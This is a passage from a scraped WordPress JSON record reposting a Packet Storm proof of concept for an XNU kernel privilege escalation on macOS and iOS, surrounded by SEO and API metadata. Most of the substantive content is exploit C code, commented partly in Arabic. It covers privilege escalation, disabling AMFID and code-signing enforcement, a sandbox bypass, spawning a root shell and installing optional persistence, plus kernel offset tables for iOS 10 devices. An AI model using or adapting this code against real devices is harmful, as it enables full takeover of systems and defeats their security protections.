printf(\\”[+] Kernel slide: 0x%llx\\\\n\\”, kernel_slide);\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 3: \u0631\u0641\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u062d\u0627\u0644\u064a\u0629\\n escalate_privileges(getpid());\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 4: \u062a\u0639\u0637\u064a\u0644 AMFID\\n disable_amfid();\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 5: \u062a\u062e\u0637\u064a sandbox\\n bypass_sandbox(getpid());\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 6: Patch kernel checks\\n patch_kernel_code_signature_checks();\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 7: \u0625\u0646\u0634\u0627\u0621 root shell\\n create_root_shell();\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 8: \u062a\u062b\u0628\u064a\u062a persistence (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n if (argc \\u003e 1 \\u0026\\u0026 strcmp(argv[1], \\”–persist\\”) == 0) {\\n install_persistence();\\n }\\n \\n printf(\\”[+] Exploitation complete!\\\\n\\”);\\n printf(\\”[+] You now have:\\\\n\\”);\\n printf(\\” – Kernel task port\\\\n\\”);\\n printf(\\” – Root privileges\\\\n\\”);\\n printf(\\” – AMFID disabled\\\\n\\”);\\n printf(\\” – Sandbox bypassed\\\\n\\”);\\n printf(\\” – Code signing disabled\\\\n\\”);\\n \\n \/\/ \u062d\u0627\u0641\u0638 \u0639\u0644\u0649 \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0646\u0634\u0637\u0629\\n while (1) {\\n sleep(60);\\n }\\n \\n return 0;\\n }\\n \\n =================\\n This fragment shows key kernel\u2011level post\u2011exploitation utilities used after gaining arbitrary read\/write access on macOS\/iOS (XNU).\\n \\n It implements:\\n \\n Kernel Base Discovery\\n find_kernel_base() scans the high kernel address space to locate the Mach\u2011O magic (0xFEEDFACF), determining the kernel base mapping.\\n \\n Process Lookup in Kernel\\n get_proc_for_pid() walks the allproc linked list within the kernel to locate the proc structure associated with a specific PID.\\n \\n Security Enforcement Disabling\\n patch_codesign() disables kernel\u2011enforced code signing by patching several internal flags (CS enforcement, AMFI, and pointer\u2011stability checks), allowing execution of unsigned binaries and jailbreak\u2011style payloads.\\n \\n \ud83d\udccc Role in Exploit Chain:\\n These routines are typically executed after the race condition exploit grants a kernel task port, enabling full kernel memory access.\\n \\n #include \\”exploit.h\\”\\n \\n uint64_t find_kernel_base() {\\n \/\/ \u0627\u0628\u062d\u062b \u0639\u0646 kernel base \u0639\u0646 \u0637\u0631\u064a\u0642 scanning memory\\n for (uint64_t addr = 0xFFFFFFF000000000ULL; addr \\u003c 0xFFFFFFF100000000ULL; addr += 0x100000) {\\n uint32_t magic = 0;\\n kernel_read(addr, \\u0026magic, sizeof(magic));\\n \\n if (magic == 0xFEEDFACF) { \/\/ Mach-O magic\\n printf(\\”[+] Found kernel at 0x%llx\\\\n\\”, addr);\\n return addr;\\n }\\n }\\n return 0;\\n }\\n \\n uint64_t get_proc_for_pid(pid_t pid) {\\n uint64_t allproc = kernel_base + ALLPROC_OFFSET;\\n uint64_t current_proc = 0;\\n \\n kernel_read(allproc, \\u0026current_proc, sizeof(current_proc));\\n \\n while (current_proc != 0) {\\n uint32_t current_pid = 0;\\n kernel_read(current_proc + PROC_P_PID, \\u0026current_pid, sizeof(current_pid));\\n \\n if (current_pid == pid) {\\n return current_proc;\\n }\\n \\n kernel_read(current_proc, \\u0026current_proc, sizeof(current_proc));\\n }\\n \\n return 0;\\n }\\n \\n void patch_codesign() {\\n \/\/ Patch cs_enforcement_disable\\n uint64_t cs_enforcement = kernel_base + CS_ENFORCEMENT;\\n uint8_t zero = 0;\\n kernel_write(cs_enforcement, \\u0026zero, sizeof(zero));\\n \\n \/\/ Patch amfi_enforce\\n uint64_t amfi_enforce = kernel_base + AMFI_ENFORCE;\\n uint32_t amfi_zero = 0;\\n kernel_write(amfi_enforce, \\u0026amfi_zero, sizeof(amfi_zero));\\n \\n \/\/ Patch vm_map_enter check\\n uint64_t vm_map_enter_check = kernel_base + 0x123456; \/\/ \u0645\u062b\u0627\u0644\\n uint32_t nop = 0xD503201F; \/\/ NOP instruction\\n kernel_write(vm_map_enter_check, \\u0026nop, sizeof(nop));\\n \\n printf(\\”[+] Code signature patches applied\\\\n\\”);\\n }\\n \\n =================================\\n offsets.h (kernel offsets by version):\\n \\n #ifndef OFFSETS_H\\n #define OFFSETS_H\\n \\n \/\/ iOS 10.1.1 (14B100) – iPhone 6s\\n #if defined(TARGET_IPHONE_6S_10_1_1)\\n #define KERNEL_BASE 0xFFFFFFF007004000ULL\\n #define KERNPROC_OFFSET 0x005AA0E0ULL\\n #define ALLPROC_OFFSET 0x005A4128ULL\\n #define REALHOST_OFFSET 0x005A8050ULL\\n #define OSBoolean_True 0xFFFFFFF0070A9B78ULL\\n #define OSBoolean_False 0xFFFFFFF0070A9B68ULL\\n #define CS_ENFORCEMENT 0x003F7A18ULL\\n #define AMFI_ENFORCE 0x004F3A00ULL\\n \\n \/\/ iOS 10.2 – iPhone 7\\n #elif defined(TARGET_IPHONE_7_10_2)\\n #define KERNEL_BASE 0xFFFFFFF007004000ULL\\n #define KERNPROC_OFFSET 0x005B20E8ULL\\n #define ALLPROC_OFFSET 0x005AB130ULL\\n \/\/ … \u0625\u0644\u062e\\n \\n #endif\\n \\n \/\/ Structure offsets\\n #define PROC_P_PID 0x60\\n #define PROC_TASK 0x10\\n #define PROC_UCRED 0x100\\n #define PROC_P_COMM 0x270\\n #define PROC_P_NEXT 0x0\\n \\n #define TASK_ITK_SELF 0xD8\\n #define TASK_BSD_INFO 0x358\\n \\n #define UCRED_CR_UID 0x18\\n #define UCRED_CR_RUID 0x1C\\n #define UCRED_CR_SVUID 0x20\\n #define UCRED_CR_LABEL 0x78\\n \\n #endif \/\/ OFFSETS_H\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213295″,”cvss”:{“score”:9.3,”severity”:”HIGH”,”vector”:”AV:N\/AC:M\/Au:N\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”baseScore”:7.8,”baseSeverity”:”HIGH”,”attackVector”:”LOCAL”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/213295\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-24T16:34:18″,”description”:”This proof of concept targets a race\u2011condition vulnerability in the XNU kernel affecting macOS\/iOS. By forcing a use\u2011after\u2011free condition on kernel ports, the exploit manipulates…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,55,12,15,13,53,7,11,5],"class_list":["post-32691","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32691\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-24T16:34:18″,”description”:”This proof of concept targets a race\u2011condition vulnerability in the XNU kernel affecting macOS\/iOS. By forcing a use\u2011after\u2011free condition on kernel ports, the exploit manipulates...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32691\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-24T11:45:16+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295\",\"datePublished\":\"2025-12-24T11:45:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\"},\"wordCount\":3702,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\",\"name\":\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-24T11:45:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32691\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32691#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32691","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem","og_description":"{“lastseen”:”2025-12-24T16:34:18″,”description”:”This proof of concept targets a race\u2011condition vulnerability in the XNU kernel affecting macOS\/iOS. By forcing a use\u2011after\u2011free condition on kernel ports, the exploit manipulates...","og_url":"https:\/\/zero.redgem.net\/?p=32691","og_site_name":"zero redgem","article_published_time":"2025-12-24T11:45:16+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32691#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32691"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295","datePublished":"2025-12-24T11:45:16+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32691"},"wordCount":3702,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-9.3","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32691#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32691","url":"https:\/\/zero.redgem.net\/?p=32691","name":"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-24T11:45:16+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32691#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32691"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32691#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 macOS 10.12.2 XNU Kernel Privilege Escalation_PACKETSTORM:213295"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32691","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32691"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32691\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32691"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32691"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32691"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}